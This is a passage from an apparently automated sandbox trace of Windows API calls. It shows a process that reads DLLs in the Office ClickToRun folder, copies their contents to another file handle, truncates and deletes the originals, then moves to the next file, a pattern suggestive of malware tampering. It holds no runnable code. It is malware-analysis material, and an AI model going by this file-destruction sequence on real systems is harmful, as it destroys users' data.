Size=0xb6) returned 0x4ebc8 [0090.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=91 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll") returned 91 [0090.019] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0090.019] GetFileType (hFile=0x368) returned 0x1 [0090.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a5b0 [0090.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0090.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0090.020] GetLastError () returned 0x0 [0090.020] SetLastError (dwErrCode=0x0) [0090.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0090.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0090.020] GetLastError () returned 0x0 [0090.020] SetLastError (dwErrCode=0x0) [0090.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0090.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0090.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x49ca0 [0090.020] ReadFile (in: hFile=0x368, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0090.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0090.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6f0 [0090.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4aca8 [0090.022] GetLastError () returned 0x0 [0090.022] SetLastError (dwErrCode=0x0) [0090.022] GetLastError () returned 0x0 [0090.023] SetLastError (dwErrCode=0x0) [0090.023] GetLastError () returned 0x0 [0090.023] SetLastError (dwErrCode=0x0) [0090.023] GetLastError () returned 0x0 [0090.023] SetLastError (dwErrCode=0x0) [0090.023] ReadFile (in: hFile=0x368, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.023] WriteFile (in: hFile=0x418, lpBuffer=0x4aca8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4aca8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.024] GetLastError () returned 0x0 [0090.024] SetLastError (dwErrCode=0x0) [0090.024] GetLastError () returned 0x0 [0090.024] SetLastError (dwErrCode=0x0) [0090.024] GetLastError () returned 0x0 [0090.025] SetLastError (dwErrCode=0x0) [0090.025] GetLastError () returned 0x0 [0090.025] SetLastError (dwErrCode=0x0) [0090.025] ReadFile (in: hFile=0x368, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.025] WriteFile (in: hFile=0x418, lpBuffer=0x4aca8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4aca8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.025] GetLastError () returned 0x0 [0090.025] SetLastError (dwErrCode=0x0) [0090.025] GetLastError () returned 0x0 [0090.025] SetLastError (dwErrCode=0x0) [0090.025] GetLastError () returned 0x0 [0090.025] SetLastError (dwErrCode=0x0) [0090.026] GetLastError () returned 0x0 [0090.026] SetLastError (dwErrCode=0x0) [0090.026] ReadFile (in: hFile=0x368, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.026] WriteFile (in: hFile=0x418, lpBuffer=0x4aca8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4aca8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.026] GetLastError () returned 0x0 [0090.026] SetLastError (dwErrCode=0x0) [0090.026] GetLastError () returned 0x0 [0090.026] SetLastError (dwErrCode=0x0) [0090.026] GetLastError () returned 0x0 [0090.026] SetLastError (dwErrCode=0x0) [0090.026] GetLastError () returned 0x0 [0090.026] SetLastError (dwErrCode=0x0) [0090.027] ReadFile (in: hFile=0x368, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x327f0c4*=0xac0, lpOverlapped=0x0) returned 1 [0090.027] WriteFile (in: hFile=0x418, lpBuffer=0x4aca8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4aca8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.027] GetLastError () returned 0x0 [0090.027] SetLastError (dwErrCode=0x0) [0090.027] GetLastError () returned 0x0 [0090.027] SetLastError (dwErrCode=0x0) [0090.027] ReadFile (in: hFile=0x368, lpBuffer=0x49ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0090.027] GetLastError () returned 0x0 [0090.027] SetLastError (dwErrCode=0x0) [0090.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6f0 | out: hHeap=0x20000) returned 1 [0090.028] WriteFile (in: hFile=0x418, lpBuffer=0x4aca8*, nNumberOfBytesToWrite=0xac0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x4aca8*, lpNumberOfBytesWritten=0x327ef70*=0xac0, lpOverlapped=0x0) returned 1 [0090.028] GetLastError () returned 0x0 [0090.028] SetLastError (dwErrCode=0x0) [0090.028] GetLastError () returned 0x0 [0090.028] SetLastError (dwErrCode=0x0) [0090.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0090.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0090.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0090.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0090.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4aca8 | out: hHeap=0x20000) returned 1 [0090.028] CloseHandle (hObject=0x418) returned 1 [0090.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0090.030] CloseHandle (hObject=0x368) returned 1 [0090.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0090.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0090.030] AreFileApisANSI () returned 1 [0090.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0090.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x4ebc8 [0090.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=91 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll") returned 91 [0090.030] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0090.039] GetFileType (hFile=0x368) returned 0x1 [0090.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x49ca0 [0090.040] GetLastError () returned 0xb7 [0090.040] SetLastError (dwErrCode=0xb7) [0090.040] WriteFile (in: hFile=0x368, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0090.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0090.041] CloseHandle (hObject=0x368) returned 1 [0090.041] AreFileApisANSI () returned 1 [0090.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0090.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x4ebc8 [0090.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=91 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll") returned 91 [0090.041] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll")) returned 1 [0090.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0090.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0090.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0090.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0090.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0090.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0090.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4f8 | out: hHeap=0x20000) returned 1 [0090.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0090.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0090.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c288 | out: hHeap=0x20000) returned 1 [0090.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0090.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0090.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0090.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0090.043] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.043] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.043] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x6cc0, dwReserved0=0x1, dwReserved1=0x202f4, cFileName="api-ms-win-crt-math-l1-1-0.dll", cAlternateFileName="APAE51~1.DLL")) returned 1 [0090.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0090.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0090.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0090.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0090.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0090.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0090.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0090.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0090.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0090.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0090.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0090.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0090.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0090.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0090.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0090.043] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0090.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0090.043] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0090.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0090.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0090.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0090.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x55f20 [0090.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0090.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0090.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0090.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.044] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.044] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.044] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.044] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.044] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0090.044] AreFileApisANSI () returned 1 [0090.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 89 [0090.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0090.044] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.044] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0090.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0090.044] AreFileApisANSI () returned 1 [0090.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0090.044] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x4ebc8 [0090.044] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll") returned 89 [0090.044] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0090.045] GetFileType (hFile=0x368) returned 0x1 [0090.045] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.045] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0090.045] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0090.045] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0090.045] CloseHandle (hObject=0x368) returned 1 [0090.046] AreFileApisANSI () returned 1 [0090.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0090.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x4ebc8 [0090.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll") returned 89 [0090.046] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-math-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0090.046] GetFileType (hFile=0x368) returned 0x1 [0090.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.046] CloseHandle (hObject=0x368) returned 1 [0090.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.046] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.046] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.047] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.047] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0090.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0090.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0090.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0090.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0090.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0090.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.122] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0090.122] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0090.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0090.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0090.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0090.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0090.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0090.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0090.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0090.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0090.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0090.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0090.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0090.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0090.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0090.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0090.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0090.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0090.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0090.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0090.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0090.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0090.151] AreFileApisANSI () returned 1 [0090.151] MultiByteToWideChar (in: 